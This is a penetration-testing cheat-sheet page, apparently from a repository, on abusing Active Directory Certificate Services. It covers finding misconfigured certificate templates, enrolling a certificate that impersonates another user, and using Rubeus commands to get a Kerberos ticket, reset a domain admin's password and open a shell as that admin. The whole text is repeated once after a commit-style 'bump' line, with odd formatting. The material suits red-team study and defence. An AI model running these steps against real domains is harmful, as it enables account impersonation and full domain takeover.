killchain-compendium/misc/active_directory/AD_CS.md

## Active Directory Certificate Service ADCS

* Internal CA
* PKI
* File system encryption
* Digital signatures
* User authentication

* __Certificates will not be revoked after account password reset__

## Certificate Templates

* Extended/Enhanced Key Usage 
* Parameter combination can be exploited

### Enumeration

* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)

```sh
certutil -v -template > ct.txt
```

Exploitable templates should have the following traits:
* `Allow Enroll` or `Allow Full Control` permissions to request certificate
    * Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
 
### Certificate Creation

* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save

### Impersonation 

* Request TGT with the created cert
* Grab TGT

* On the machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
```
* Select a domain admin via opening `Active Directory Users and Computers`
```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
```
* `runas /user:<domain>\<username of DA> cmd.exe`
bump 2022-02-23 23:55:12 +01:00			`## Active Directory Certificate Service ADCS`

			`* Internal CA`
			`* PKI`
			`* File system encryption`
			`* Digital signatures`
			`* User authentication`

			`* __Certificates will not be revoked after account password reset__`

			`## Certificate Templates`

			`* Extended/Enhanced Key Usage`
			`* Parameter combination can be exploited`

			`### Enumeration`

			`* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)`

			```sh
			`certutil -v -template > ct.txt`
			```

			`Exploitable templates should have the following traits:`
			* `Allow Enroll` or `Allow Full Control` permissions to request certificate
			* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
			* Client authentication EKU for Kerberos authentication --> `Client Authentication`
			* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`

			`### Certificate Creation`

			* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
			* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
			* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
			* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save

			`### Impersonation`

			`* Request TGT with the created cert`
			`* Grab TGT`

			`* On the machine via`
			```sh
			`Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>`
			```
			* Select a domain admin via opening `Active Directory Users and Computers`
			```sh
			`.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>`
			```
			* `runas /user:<domain>\<username of DA> cmd.exe`